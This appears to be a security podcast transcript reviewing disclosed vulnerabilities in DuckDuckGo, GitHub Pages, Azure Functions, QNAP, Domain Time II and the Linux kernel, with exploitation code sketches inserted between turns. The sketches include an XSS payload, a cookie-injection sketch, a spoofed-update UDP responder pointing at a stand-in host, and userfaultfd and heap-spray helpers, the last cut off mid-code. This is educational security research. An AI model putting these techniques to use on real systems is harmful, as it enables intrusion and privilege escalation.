Yeah, honestly they should probably just be validating the zip attachments and just not extracting symbolic links and stuff. But yeah, I mean, it's always fun to see Apple stuff, but not too much to say on that one, it was a pretty straightforward issue. We have a quick stored XSS in the privacy-based search engine DuckDuckGo, in its search result page. The XSS is in the green URL text underneath the headline of the search result; that URL was not sanitized against cross-site scripting, which could be taken advantage of in a number of ways using a few websites. The ways they point out are using search queries on things like Urban Dictionary and Bitdefender profile URLs. So yeah, you can just generate a query for that with an XSS payload in it, send a link to the search results page for that, and XSS somebody. That said, this would be a pretty obvious attack to anyone who scrutinizes links before they click them; they'd be able to see the XSS payload directly in the URL, unless it was chained with another issue, like one of those issues you see sometimes with chat clients where you can substitute the link that you're directed to from what's actually being displayed to the user, which is an issue in and of itself. But
zi
yeah. So, well, they use the example here of having the actual XSS payload as part of the search. In this case, in theory, you wouldn't have to do that. It would be more difficult to go about it, but you could come up with some page that has the payload in its URL but has a normal-looking search term, because the search doesn't need to be a popular search, it doesn't need to be something that they're even going to naturally look up themselves. It could just be, like, you know, a face smash on the keyboard, and you register that domain so it's going to come up when they search for it, and you get that URL in there. At that point it's not going to be in the URL when they click it, and it will execute when they load the page. So you can hide it, as long as your search query pulls it up, that's kind of the main thing. It's just that their example here has it being right in the URL, but in theory, as long as it's in the result URL, it doesn't need to be in the search string.
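The fix on the rendering side is just context-appropriate output encoding of the displayed URL instead of treating it as HTML. A minimal sketch of the difference; the surrounding markup is made up, not DuckDuckGo's actual template:

```python
from html import escape

display_url = 'https://example.com/"><img src=x onerror=alert(1)>'

unsafe = f'<span class="result-url">{display_url}</span>'                    # payload becomes markup
safe = f'<span class="result-url">{escape(display_url, quote=True)}</span>'  # rendered as plain text

print(unsafe)
print(safe)
```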
Specter
Yeah, and Word of Mouth from chat mentions a link shortener, that's another valid point to bring up, to try to obfuscate what you're
zi
accessing. I'm more likely to scrutinize any short links that I run across than I am just random links.
Specter
See, where that kind of falls apart for me is on Twitter, because unfortunately Twitter uses short links for everything. So there are some places where I could see it being pulled off, and I think, yeah, you mentioned t.co, right, in chat. So yeah, there are a few avenues where I can see a link shortener being taken advantage of, but you'd have to get creative, basically, to be able to pull off this attack in a practical context. So I find it very interesting that there was even this issue at all on DuckDuckGo's page. That seems like a fairly obvious thing to check for XSS, that kind of data, but I don't know,
zi
maybe not. It's like, oh, maybe that kind of has some legacy code to it. I don't really know much of anything about DuckDuckGo's code base. It feels like one of those things where, in most, well, not most, but in a lot of web applications these days that are actively maintained, they're also using a framework that should be dealing with most of the simple XSS cases, you know, assigning the text to be displayed somewhere, not just using it as HTML. Yeah, so that just feels a little bit odd to
Specter
me. Yeah, I guess it was just something that slipped through the cracks somehow, I don't know. But yeah, it was interesting to see that it was there nonetheless.
zi
Yeah, like, I can kind of understand why somebody might look at this and think, okay, the URL is somewhat safe, not really thinking about it actually including these characters, especially if you're maybe expecting it to be URL-encoded or something. Like, they might be thinking along those lines; I could understand the thought
Specter
process there. Yeah. Alright, so another episode, another GitHub issue. This one is affecting private Pages and is potentially the highest-paid bug bounty by GitHub so far. I did try to take a quick look at that; it was hard to confirm because they have a lot of reports, by the way. But yeah, it consists of a few different issues that are related to one vector. So the post starts out by detailing the authentication flow of how private pages are accessed on GitHub. A user is checked if they're authenticated; if not, it'll generate a nonce inside of your session and direct you to the login endpoint with the page ID, where after successful login it'll generate an auth token associated with that nonce. They also state that the session cookie where the nonce is stored uses the __Host- prefix, which most browsers except for IE will respect, and prevent JavaScript from setting it against a non-host domain. The page ID in the session cookie is where the first bug comes into play: they found an issue where you could inject the page ID parameter into the cookie, which was interesting but quite restrictive, because the ID is converted to an integer, so they couldn't easily use any non-integer characters, including spaces. What you could potentially do though is inject a null byte to break out of the integer parsing, to do something interesting there. Well, some...
zi
You could inject the spaces. Sorry, I might have just misheard you, it sounds like you might have said they couldn't inject spaces. That was the thing that actually tipped them off to the fact that there was a bug going on here, that there was some sort of disconnect going on. What ends up happening is they have the page ID, and if you're able to see the screen and not just listening to us, you'll notice there's a space before that semicolon. They were able to get that space there because it would parse it to an integer, but when reflecting it in the cookie, it would use the original value. So they have this pseudocode here where it would do the to-integer on the page ID, but when setting the cookie it would use the original value. Yeah, so there's kind of that disconnect between the parser and then, what you were just getting to is the fact that, yeah, the way they got around not being able to include any sort of text characters, because the to-integer would fail then, was by using a null byte to kind of stop the processing, and then after the null byte they can include whatever characters they want. But whitespace was kind of allowed, and that was the thing that kind of had them notice that there was a possible bug there.
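A small sketch of the parse-versus-reflect disconnect being described, in the spirit of the pseudocode on screen rather than GitHub's actual code: the value is validated through a lenient to-integer conversion, but the raw string is what gets reflected into the Set-Cookie header, so whitespace, and anything after a null byte, rides along:

```python
import re

def lenient_to_int(value: str):
    """Illustrative lenient parse: take the leading digits and ignore the rest."""
    m = re.match(r"\d+", value)
    return int(m.group()) if m else None

def build_set_cookie(page_id_param: str):
    if lenient_to_int(page_id_param) is None:
        return None  # "validation" passes as long as the value starts with digits
    # Bug pattern: the ORIGINAL string is reflected, not the parsed integer.
    return f"Set-Cookie: __Host-session=page_id={page_id_param}; Secure; Path=/"

# Everything after the null byte becomes attacker-controlled cookie content.
print(build_set_cookie("1234\x00; injected=value"))
```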
Specter
Yeah, sorry, I think I confused myself there. For some reason I thought they were saying the whitespace wasn't allowed, but yeah, when you explained it, and when I was re-reading it while you were talking about it, that makes more sense. I don't know how I messed that up, but thank you for correcting me on that. So yeah, by injecting a null byte into the content body, they were able to use that in order to get XSS on the page. They did have to put it in the content body; if they put it in the header, the header would get rejected. Yeah.
zi
Just kind of for clarification, say, getting into the content body: the traditional way to get XSS when you have a header injection like this, well, technically it's not a header injection, as Specter just said, you couldn't put a null byte in the header, but you could have the whitespace, so carriage return, newline, carriage return, newline, basically having a blank line, is how HTTP separates the headers from the actual body. So you inject the two newlines, a null byte, and then you control the body. I mean, I assume a lot of you probably already knew that, but I figured I'd explain it at
Specter
least. Yeah, so that gave them JavaScript execution on the page. The third issue was required for getting around the nonce checking in the authentication flow, and that was based on the fact that sibling private pages within the same organization could set cookies on each other, which kind of makes sense, but they note you can take advantage of that by setting a fake nonce on a sibling page and then getting it passed down to the private page. And that's if you can bypass that __Host- prefix protection, which leads to the next issue, which is where the browsers were case sensitive on the host prefix check but the GitHub Pages server was case insensitive. So again, you kind of have that disconnect going on: if you changed the cookie name so the prefix was a different case, GitHub would still accept it even if the browser wouldn't. The fourth issue that makes this attack really cool is the fact that the response on the auth endpoint was cached based on the parsed page ID value, which means an attacker can basically do cache poisoning to hit other users with the XSS, making it a much more interesting attack. The final issue was a misconfiguration where public repositories could have private pages, which could be viewed by anyone. So, "private" in air quotes, which,
zi
it's still kind of intended, like, it's a private page, or it's part of the private Pages program, but if they make the repository public then anybody can read it. So I don't know, that feels almost intentional, like, you make it public, of course we can read the pages now. Like, I don't know if I necessarily agree with calling it a misconfiguration. I know they do in the write-up, so fair enough,
Specter
whatever. Well, I think where the misconfiguration comes into play is, okay, yeah, you can view those private pages, which is intended, but it allows a pivot point to be able to get access into internal private pages by cache poisoning an employee, since, remember, sibling pages can set cookies on other pages in the same organization. So that's where I think the misconfiguration comes in, it's not handling that case. I guess it's kind of an edge case.
zi
I believe you can do that with the original one though. So, say, they have the example here where, when the privileged user visits the unprivileged organization, they get the XSS there, and they set the domain cookie there, and then perform the same attack against the privileged organization. Whereas using this thing, using the public-private pages, if somebody, or if something had that set up,
Specter
then they'd be able to
zi
attack it directly without that middle step. Because they were going after that last one for the CTF bonus, which I guess we haven't really mentioned yet. With GitHub's bounty program, specifically on the private Pages bounty, they have bonuses for actually writing payloads that do something. So they've got a flag up on a private org's github.io page; if you're able to read that with user interaction, I think it's like a 5K bonus, if you're able to read that without user interaction it's 10K, and then if you're able to read it without user interaction, or sorry, just if the account is outside of the private organization, they get another 5K. So going for the bonuses is where they kind of added it in, that's where this part came in. So I think it basically just lets you skip that one step of the exploit chain.
Specter
Yeah, those CTF bonuses were really cool, I thought. I don't remember hearing about that when we covered some of the other GitHub issues. Maybe we didn't, I...
zi
I've just heard it once before, not on this one in particular, but when we were dealing with the auth bypasses, I think, in GitHub, the CTF bonuses at least came up in those write-ups, I think.
Specter
Okay, so I probably just forgot. But yeah, that was an interesting aspect. And yeah, I mean, not a bad payout for these issues. I think we mentioned the payout amount, but yeah, it was like 35K total. So yeah, quite a nice haul for the researcher.
zi
yeah,
Specter
Next we have a cloud attack, a privilege escalation inside of Azure Functions containers, which run Docker in a privileged context, and that is an important thing to note, because when Docker is run with the privileged flag it'll share devices, like character devices and stuff, between the host and the container guests, because Docker, like... oh, sorry, were you going to...? I was just going to add
zi
on that, like, running it as privileged basically means if you get root inside of the container, you can get root on the host. Like, that's the deal with privileged; the privileged flag basically means root is root
Specter
equivalent. Yeah, so basically, for those who don't know, Docker isn't a full VM, right, it's not going to be running its own guest kernel, it's going to be sharing the kernel with the host, and that's kind of where the problem comes into play. The problem is that the device sharing is overly permissive: the persistent memory, or pmem, device is exposed to the sandbox with read-write capabilities, and those devices can be used to get control of the host's file system and change file contents directly on the block device; it was an ext4 file system, I believe they said. Initially they tried using that to get control over /etc/passwd, which didn't work at first because of how the Linux kernel does file caching; basically, it won't propagate file changes until the cached pages are discarded. I think we talked about this before in the context of another vulnerability, but that's where the "Royal Flush" name comes into play: they basically use posix_fadvise to tell the kernel to flush pages from the read cache to get the changes propagated, to take control of that /etc/passwd. To be clear, that's not the only attack you could do; you could essentially attack any file on the host's file system, as I understand it, so your possibilities are basically endless there. MSRC stated that this issue had no impact on Azure Functions users, since these Docker containers run inside of a Hyper-V guest. So, like I was kind of saying earlier, Docker doesn't do its own isolation by running its own guest kernel, so what Microsoft does is they run the Docker instance inside of a Hyper-V guest, so they have that multi-layer isolation. So even if you pulled off this attack, you wouldn't be able to take control over the real host; the host you compromise in this case was still a guest, right? It's kind of like nesting dolls with sandboxing. Still interesting though, and this would definitely be part of a chain if you were trying to do a full escape. Oh yeah, cool attack, but it mainly just comes down to: don't be oversharing when it comes to sandboxing. The entire idea of sandboxing is you only provide what's absolutely necessary, right? And from what I can tell, these pmem devices definitely were not necessary and should not have been exposed to the sandbox with read-write capability.
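The page-cache flush they describe corresponds to the posix_fadvise(POSIX_FADV_DONTNEED) hint, which asks the kernel to drop cached pages for a file so later reads come back from the (now modified) backing device. A minimal sketch of that call on Linux; the target path is just the /etc/passwd example from the discussion:

```python
import os

def drop_page_cache(path: str) -> None:
    """Ask the kernel to discard cached pages for `path` (Linux/Unix only)."""
    fd = os.open(path, os.O_RDONLY)
    try:
        # POSIX_FADV_DONTNEED: we won't need these pages, so the kernel is free
        # to evict them; length 0 means "from offset to end of file".
        os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
    finally:
        os.close(fd)

drop_page_cache("/etc/passwd")
```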
zi
So yeah, although the fact that it's exposed with read-write is intentional, because the default, I believe they show, is that everybody does not get read-write access to it; they show a screenshot showing exactly that. So the fact that they do enable read-write access within the Azure Functions container makes it seem like there is some reason they did that. It's not clear what that is, but somebody made that decision at some
Specter
point. Yeah, and it seems like this issue is probably still an issue, because they never mentioned Microsoft fixing it, and like I said, they mentioned that MSRC didn't consider it to have security impact because, I guess, since it's running inside a Hyper-V guest, they don't consider being able to escape out of the Docker container a security barrier. It's another one of those cases where I don't necessarily agree with Microsoft and how they set security boundaries, but I mean, they are the
zi
It's, like... what
Specter
to Microsoft... I want to know exactly what this
zi
is. Classic Microsoft pattern: do some security, implement some security mechanism, but say it's not a security
Specter
boundary. Yeah, "won't fix", favorite tag of Microsoft when it comes to those types of security issues, where they don't consider it a security boundary, which I think they should, but you know, whatever. Next we have a quick issue in QNAP NAS, in the Surveillance Station local display function endpoint. It takes untrusted data in the form of parameters in an HTTP request. It's basically one of those "don't use strcpy where you shouldn't" type of issues, where they used strcpy when receiving the SID and other parameters into a fixed-size buffer. I'm not exactly sure of the length, because the snippet that was shared was pretty limited, but just by passing a really large string, like 0x5000 bytes long, you can stack smash, right? You just overflow the stack buffer. Presumably they don't use stack cookies, because this issue was labeled as a pre-auth remote code execution, which isn't too surprising, because as we've said before, unfortunately mitigations are basically non-existent in these types of products, especially stack cookies. If they had stack cookies here, this probably wouldn't be exploitable for getting code execution; basically what they're doing is just smashing the stack to get to the return pointer, and there's nothing protecting that return pointer. But it would have been so
zi
much worse performance if they had stack cookies.
Specter
I know, it would be like maybe two percent performance overhead. I don't care what
zi
the performance overhead is for stack cookies. Actually, it is a lot higher than some of the other things like DEP or ASLR, which, well, DEP at least is hardware-enforced, because it is a software thing. It does the extra push every time, it does the extra check every time you return. So if you've got a lot of functions, there is a significant overhead. That's why there are usually some heuristics on how the compiler decides to include it or not. You can change that to include it on everything, but by default most compilers use a few heuristics for it. But yeah, I mean, honestly, anything
Specter
that takes untrusted input should have a stack cookie on it. Yeah. So yeah, pretty straightforward issue. It's not that you can't use strcpy anywhere, but if you're going to use strcpy, make sure it's taking a string that is entirely validated and isn't going to be just some really long string that somebody passes in or something. So yeah, I'm gonna be honest, you could strcpy and just go
zi
and put a null byte in, man. Like, you just jump ahead 0x80 bytes, toss a null byte there, and then strcpy.
Specter
You're kind of limiting it
zi
that way. I would rather see, you know, strncpy or something where the bound is kind of built into the function, but there are secure ways of using strcpy.
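To make that concrete, here's a small sketch; it is not the QNAP code (the real buffer size isn't public, so the 64 bytes below is an assumption), but it shows the difference between an unbounded strcpy of attacker-controlled input and a bounded copy with forced NUL termination.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical handler: the real QNAP buffer size isn't public, so the
 * 64 bytes here is just an illustrative choice. */
#define SID_BUF_LEN 64

/* Unsafe: copies until the NUL in 'sid', however far away that is. */
void handle_sid_unsafe(const char *sid)
{
    char buf[SID_BUF_LEN];
    strcpy(buf, sid);               /* overflows buf if sid is long */
    printf("sid: %s\n", buf);
}

/* Safer: bound the copy by the destination size and terminate it. */
void handle_sid_bounded(const char *sid)
{
    char buf[SID_BUF_LEN];
    strncpy(buf, sid, sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';    /* strncpy does not always NUL-terminate */
    printf("sid: %s\n", buf);
}

int main(void)
{
    char huge[0x5000];
    memset(huge, 'A', sizeof(huge) - 1);
    huge[sizeof(huge) - 1] = '\0';

    handle_sid_bounded(huge);       /* truncates; no corruption */
    /* handle_sid_unsafe(huge);        would smash the stack buffer */
    return 0;
}
```

strlcpy or snprintf are other common choices; the important part is that the bound comes from the destination buffer, not from the attacker's string.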
Specter
Yeah, our next attack is on Greyware's Domain Time II, which is software and a custom protocol for trying to keep clients' and servers' clocks as closely synchronized as possible. It's a man-on-the-side attack, which I'll be honest was a new term to me. It's basically like a MITM, except you can't manipulate the data in flight; you can only inject data in between, so it's kind of like a MITM but a little bit more limited. One of the things the application will do, which is pretty common, is check for any updates from the update server when it launches, which it does by sending a UDP query from the Domain Time tray application. If an attacker can intercept that and respond with a legitimate-looking URL before the actual server does, the client can be fooled into downloading a malicious update binary, right? So it's basically just a race on that communication between the client and the server, and being able to inject that response. It is worth noting this isn't a privilege escalation. It basically gets an attacker a foothold onto the system, but you're going to be compromising the application at the level it's running at, right? You're not going to be able to escalate using this bug, which they point out in the blog post.
zi
Like, a remote user shouldn't have code execution on your system at any user level. So it is kind of an escalation of privilege in that sense, but it's not an elevation to, like, root, or I guess in this case SYSTEM or admin. Yeah, but I will also mention they do talk a little bit about the other option of racing the DNS. DNS is also potentially happening over UDP, so you can inject your own response to the DNS request. Then you could use the real address, or a real-looking address, just swapping HTTPS for HTTP, and intercept that also, because you control where it's going to go by manipulating the DNS response, I should say. That's the other attack scenario they showed: besides racing this one, you can also just race the DNS lookup, which is one of the options they provided in their actual attack script. But overall, I mean, it's a simple issue. It really comes down to the fact that UDP doesn't have any guarantees and can easily be spoofed.
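A bare-bones illustration of that race: the port number and message format below are invented, not Domain Time II's real protocol, and a true man-on-the-side attacker would additionally spoof the legitimate server's source address with a raw socket, which is omitted here. The point is just that whichever datagram reaches the client first is the one it trusts, since nothing in the reply is authenticated.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    /* Hypothetical "update check" port; the real protocol details differ. */
    const unsigned short update_port = 9909;

    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) { perror("socket"); return 1; }

    struct sockaddr_in addr = { 0 };
    addr.sin_family = AF_INET;
    addr.sin_port = htons(update_port);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind");
        return 1;
    }

    char query[512];
    struct sockaddr_in client;
    socklen_t clen = sizeof(client);

    /* Observe the client's update query... */
    ssize_t n = recvfrom(s, query, sizeof(query), 0,
                         (struct sockaddr *)&client, &clen);
    if (n < 0) { perror("recvfrom"); return 1; }

    /* ...and answer before the legitimate server does. The client has no
     * way to tell this reply apart from the real one. */
    const char *fake = "UPDATE http://update.example.invalid/dtupdate.exe";
    sendto(s, fake, strlen(fake), 0, (struct sockaddr *)&client, clen);

    close(s);
    return 0;
}
```

The same shape applies to racing the DNS lookup, just with a forged DNS response instead of a forged update reply.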
Specter
Yeah, it's interesting. This isn't a product type I think we've ever really covered before, this kind of time synchronization product. So it's always nice
zi
I think we have covered one. I feel like we've covered a time server issue before, I couldn't tell you what episode though.
Specter
Okay, that would be interesting to look back on, because I thought that was one we hadn't really covered before in terms of product type. But yeah, anyway, let's move into the most fun exploit section of the show for me, which is the kernel exploitation stuff. Our first kernel exploit is from Alexander Popov, coming out of Zer0Con. It is a 4-byte write-after-free in the Linux kernel in the newer AF_VSOCK socket family, specifically through a socket option. It boils down to a race condition, of course, where the virtual socket transport is copied outside of the locking window. So it's that classic case of not maintaining ownership of a pointer before copying it, a pretty blatant race. Whenever you're copying a reference to something, do it inside of a lock, or else it's going to be raced, or at least have the possibility of being raced. Funnily enough, this bug was found by syzkaller, though it was really difficult to reproduce, because the bug triggered when updating a buffer size. They have a socket option for being able to change the buffer size, which is pretty common in the networking stack, but the path that had the UAF would only get taken if the size was different; otherwise it would just bail out early. So Alexander states they weren't totally sure how syzkaller even managed to hit this crash, because it took the size from the return value of the clock_gettime syscall, which normally would be consistent, because the input is generated at the time of fuzzing, not at the time of execution, like when it's generating the inputs. I can try to shed a bit of light on this; it basically comes down to how syzkaller runs programs. The syzkaller devs have done a few cool talks about how their fuzzer works, but basically they take these programs, which are defined manually, and create sets of them, and mutating them involves adding in calls, removing them, or changing the data passed to them. And one of the things it tries to do is force races by setting a program as a blocking program, to basically force another thread to run when it reaches that point. Normally, blocking programs are used to prevent infinite hangs on reads and writes, for example: if you try to read when there's no data there, it's going to hang forever. So syzkaller will mark that as a blocking syscall, which it abuses for races, right? My best guess is that something in the routine that does the race mode allows the parameter to be regenerated for that thread; that is just speculation on my part. It is kind of difficult digging through the syzkaller code base. Honestly, it's kind of a pet peeve of mine, I do not really like the way the code is structured. But yeah, it is a little bit strange, I don't know for sure. I'm guessing something with how the blocking or race mode works, where they try to get around blocking programs, leads to the parameter being regenerated there. Anyway, this leads to a 4-byte write-after-free 40 bytes into an object in the kmalloc-64 cache. For those who don't know, the Linux kernel has various general-purpose kmalloc caches, so when you have a use-after-free, for example, you can only hit objects that land in the same cache size. For kmalloc-64, that would be any object that's 33 to 64 bytes long.
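The race pattern being described is easier to see in miniature. This is a userspace simplification of the bug class, not the AF_VSOCK code: the difference is whether the shared pointer is read and used while the lock is held, or copied outside the locking window where another thread can free and replace it.

```c
#include <pthread.h>
#include <stddef.h>

struct transport {
    int (*send)(void *buf, int len);
};

static struct transport *g_transport;   /* shared; may be swapped or freed */
static pthread_mutex_t g_lock = PTHREAD_MUTEX_INITIALIZER;

/* Racy: the pointer is copied before the lock is taken, so another thread
 * can free and replace g_transport in between, and the later use is a
 * use-after-free. This mirrors "copied outside of the locking window". */
int send_racy(void *buf, int len)
{
    struct transport *t = g_transport;   /* copy outside the lock */
    pthread_mutex_lock(&g_lock);
    int ret = t->send(buf, len);          /* t may already be stale here */
    pthread_mutex_unlock(&g_lock);
    return ret;
}

/* Correct: the pointer is only read and used while the lock is held, so
 * whoever frees or replaces it has to wait until we are done with it. */
int send_locked(void *buf, int len)
{
    pthread_mutex_lock(&g_lock);
    struct transport *t = g_transport;    /* copy inside the lock */
    int ret = t ? t->send(buf, len) : -1;
    pthread_mutex_unlock(&g_lock);
    return ret;
}

static int null_send(void *buf, int len) { (void)buf; return len; }

int main(void)
{
    struct transport t = { .send = null_send };
    g_transport = &t;

    char msg[4] = "hey";
    return send_locked(msg, sizeof(msg)) == sizeof(msg) ? 0 : 1;
}
```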
So yeah, he uses this to smash an overlapped msg_msg object, which gets allocated in the msgsnd syscall. Ironically, he smashes the security pointer inside that object, which is used for SELinux stuff. That pointer gets freed whenever a message is received and popped out of the queue, so he was basically able to turn that 4-byte write-after-free into an arbitrary free, which, when chained with an info leak, will get you code execution with enough work, because you can get a targeted use-after-free on whatever pointer you want to target, which he did do. The info leak was pretty noisy, mind you: he basically abuses a kernel warning through a bad dereference on the transport, via a similar issue, which is viable; you do get kernel addresses from the register context dump, but it's very noisy, it goes directly into the kernel log. So it's totally fair for exploitation if you don't care about that, but there are some situations where you don't want that information going into the log, because that leaves a trace, basically. He then uses the arbitrary free to get a full use-after-free on the same msg_msg object, so the same object, but being able to control the whole object instead of just four bytes. He uses that to get an arbitrary read by corrupting the msg_msg header information. He then finally uses the UAF again on a different object, the skb_shared_info object, to get code execution through the destructor on that, which he uses to construct an arbitrary write. So ultimately, when you have arbitrary read/write, getting root is pretty straightforward on Linux: you just have to smash the credentials of your process. Pretty straightforward to do, unless you're looking at Android and you're on, like, a Samsung phone and you have Knox to deal with. But this is just hitting Linux in general, not Android-specific; in fact, this socket family probably doesn't even exist on Android. One thing I thought was cool was that at the end, he points out what would mess up the exploitability of the strategy. He points out a few things, like noting that something like CFI would stop it, obviously, where you're using the destructor indirect call to get code execution, to get the arbitrary write gadget. He also notes that preventing userfaultfd would make it harder to exploit the UAF. For those who aren't familiar with Linux kernel exploitation, userfaultfd is a pretty common trick: it basically allows you to handle page faults in user space, so you can set a handler that hangs the kernel when it goes to read that address, which freezes a thread, essentially, to keep your allocation in place. So preventing that would probably hit the stability, though I don't think it would prevent the exploit entirely. Another thing is the dmesg_restrict kernel option: if that was set, it would prevent the info leak, because an unprivileged process wouldn't be able to read the register context dump out of the kernel log, right? It might be possible to derive a different info leak from this issue; that said, it might be difficult. You would basically have to hunt for a different spray object to target, where you're fixed in where you hit the object, like you're always going to hit 40 bytes into the object. It's going to be really tricky to find another object, but it is technically a possibility that you could use to derive an info leak if you really wanted to.
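Since userfaultfd comes up so often in these write-ups, here's a bare-bones sketch of the trick as described, generic code rather than anything from Popov's exploit: register an anonymous page with userfaultfd, hand it to a syscall, and the kernel's copy from that page stalls until the userspace handler resolves the fault, which is what gives you a wide race window. Note that newer kernels gate unprivileged userfaultfd behind the vm.unprivileged_userfaultfd sysctl, so this may require privileges or sysctl changes on a modern system.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

static void *fault_handler(void *arg)
{
    int uffd = (int)(long)arg;
    long page = sysconf(_SC_PAGESIZE);
    struct uffd_msg msg;

    /* Blocks until something (here: the kernel, inside the write() below)
     * touches the registered page. The faulting thread stays frozen until
     * we resolve the fault; an exploit would win its race in this window. */
    if (read(uffd, &msg, sizeof(msg)) <= 0 || msg.event != UFFD_EVENT_PAGEFAULT)
        return NULL;

    printf("access stalled at %llx\n",
           (unsigned long long)msg.arg.pagefault.address);
    sleep(2);   /* stand-in for "do race-winning work here" */

    /* Resolve the fault with a zero page so the stalled write() returns. */
    struct uffdio_zeropage zp = {
        .range = {
            .start = msg.arg.pagefault.address & ~((unsigned long long)page - 1),
            .len   = (unsigned long long)page,
        },
    };
    ioctl(uffd, UFFDIO_ZEROPAGE, &zp);
    return NULL;
}

int main(void)
{
    long page = sysconf(_SC_PAGESIZE);

    int uffd = (int)syscall(SYS_userfaultfd, O_CLOEXEC);
    struct uffdio_api api = { .api = UFFD_API };
    ioctl(uffd, UFFDIO_API, &api);

    /* Fresh anonymous mapping with no backing page yet. */
    char *buf = mmap(NULL, page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    struct uffdio_register reg = {
        .range = { .start = (unsigned long)buf, .len = (unsigned long)page },
        .mode  = UFFDIO_REGISTER_MODE_MISSING,
    };
    ioctl(uffd, UFFDIO_REGISTER, &reg);

    pthread_t t;
    pthread_create(&t, NULL, fault_handler, (void *)(long)uffd);

    /* A pipe write has to copy from buf, so the kernel faults on the
     * missing page and stalls until the handler above resolves it. */
    int p[2];
    pipe(p);
    write(p[1], buf, page);

    pthread_join(t, NULL);
    return 0;
}
```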
zi
Yeah, it would be tricky, but given, like... I feel like kmalloc-64 should have a good number of objects going through it. That's not a crazy size. It would take time to find something, or maybe, you know, a CodeQL query, but otherwise I think it's reasonable to assume that there might be another
Specter
object. Yeah, the kmalloc-64 cache is one of the most commonly used caches, one of the most popular ones. So yeah, there's probably a different exploit strategy out there, but you'd have to put a lot of time into finding it. This is actually an area where something like CodeQL would probably be a good idea to use, to try to query for target objects you could hit; if you're looking for an exercise or something to do in CodeQL, that could actually be a very good application for it. But yeah, very cool exploit. Another thing I want to call out is the fact that this explicitly bypasses supervisor mode access prevention and supervisor mode execution prevention, which are pretty powerful mitigations that are often hand-waved away in a lot of the kernel exploit write-ups I've seen, so it's nice to see that it's mentioned here and isn't an issue. It's not directly bypassed, but it just goes to show that these mitigations aren't going to stop everything, right? For those who don't know what SMAP and SMEP are, they basically make it so the kernel cannot access or execute anything in user space while running in kernel mode. So you can't fake objects in user space or use ROP gadgets that are in user space in a kernel ROP chain; that's basically what those mitigations are doing. In this case, though, because he has the info leak and he's able to set up the arbitrary read and arbitrary write gadgets, that's basically not an issue. So yeah, very cool post, and it's always fun to see kernel stuff. And we have more kernel stuff coming up, too. TheFlow also put out a post about exploiting two bugs we previously covered all the way back on episode 49 of the podcast. There's a stack-based info leak in the A2MP protocol, where there were uninitialized fields in a struct that gets sent back out, and there was a type confusion on the mode set on the A2MP channels, where the receive function will call the sk_filter function on channel data thinking it's a socket object when it's actually an AMP manager object. I'm not going to go too deep into the exploit or the vulnerability details, because we already covered those, like I said, back on episode 49, and this write-up doesn't really talk about the vulnerabilities much either beyond, you know, what they are. It doesn't go into in-depth detail; it mostly talks about the exploit process. So zi, I know you were looking at the exploit strategies and probably have a better grasp on them than I have, because I was kind of more focused on the other issue, so I'll let you take
zi
it away. Fair enough, and this one is a little bit complicated in how he actually goes about doing the exploitation, so hopefully I don't butcher it. That said, if I do and you have no idea what I'm talking about at some point, it is a really good write-up that gives a lot of information, which I'll try and summarize here. As Specter already mentioned, there were the three issues; we've already talked about them. The two that actually matter here are, first, BadChoice, which is a stack-based info leak, fairly straightforward: basically, in the response object it creates in response to one of the A2MP protocol requests, it has this response (rsp) object, fills out the ID and status in there, and sends it back using, like, sizeof, so all the fields that are uninitialized in that struct get leaked out. That's all that really matters: you're getting some stack information with it. BadKarma, as Specter also said, is where, when you have that sort of A2MP channel, it uses the enhanced retransmission mode, and, sorry, I guess I'm getting ahead of myself: with the A2MP channels, the code is expecting a socket, but it gets an AMP manager. So, in order to actually start exploiting this, the thing I was just starting to mention with the mode is that you can't actually access any of the A2MP code, the stuff you need, while the channel is configured in that enhanced retransmission mode. What happens there is sk_filter ends up crashing when you try to actually reach the A2MP subroutines. So the first thing he has to figure out is, well, how do we change that mode? In theory you shouldn't really be able to, but he does find that you can just send the reconfiguration request, even if it hasn't been requested; even if the client side hasn't asked to reconfigure, you can just say, hey, yeah, reconfigure to basic mode, and send that off. And basic mode, which you shouldn't be able to use for this type of channel, effectively just uses the ops pointer and uses that for all the function calls, so that gives you a target for EIP, or RIP, control. So you've got that as a way of getting around it and getting access back to the A2MP stuff. Now, focusing on the real issue, and I'd encourage you to just read the write-up for that little bit, I feel like the actual type confusion is a bit more interesting, in a couple of ways. As we've already mentioned, you've got this AMP manager and the socket classes; that's where your confusion is happening. The AMP manager is 0x70 bytes in size, but the only access on the supposed socket that's useful is this RCU dereference. Obviously, if you're listening you can't see this, but it's filter = rcu_dereference of the socket's sk_filter, which happens to be at offset 0x110, so it's actually beyond the end of the AMP manager object itself. Even if you had complete control over that AMP manager, you would actually be going beyond the edge of the actual object. So instead of using the AMP manager for very much, what they do is some heap grooming so they can get something they control immediately after where the AMP manager gets allocated, effectively needing some primitive that can allocate, you know, 65 to 128 bytes.
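TheFlow's allocation primitive here is Bluetooth-specific and is described next; as a hedged aside for anyone wondering what "a primitive that can allocate 65 to 128 bytes" buys you, any syscall that makes a kernel allocation of a size you choose can spray a particular kmalloc cache. A commonly cited generic example is System V message queues, sketched below; the msg_msg header size (roughly 48 bytes on x86-64) is an assumption that varies by kernel and architecture, so the exact payload length needed to land in kmalloc-128 should be treated accordingly.

```c
#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

/*
 * Generic kmalloc spray sketch (not the primitive used in the write-up):
 * each msgsnd() makes the kernel allocate a msg_msg object of roughly
 * header-plus-payload bytes. With a ~48-byte header (an assumption that
 * varies by kernel/arch), a 64-byte payload lands the allocation in the
 * 65..128-byte range, i.e. kmalloc-128.
 */
#define SPRAY_COUNT 64
#define PAYLOAD_LEN 64

struct spray_msg {
    long mtype;
    char mtext[PAYLOAD_LEN];
};

int main(void)
{
    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
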